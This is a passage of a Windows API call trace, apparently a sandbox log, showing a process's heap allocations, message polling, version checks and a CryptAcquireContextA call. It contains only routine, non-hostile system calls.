HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.323] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.323] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0220.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0220.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0220.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0220.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0220.324] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.325] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.326] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0220.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.326] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0220.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.327] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.327] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0220.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.327] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0220.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0220.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0220.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0220.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0220.328] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0220.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0220.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0220.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0220.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0220.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0220.333] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0220.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0220.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0220.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0220.335] 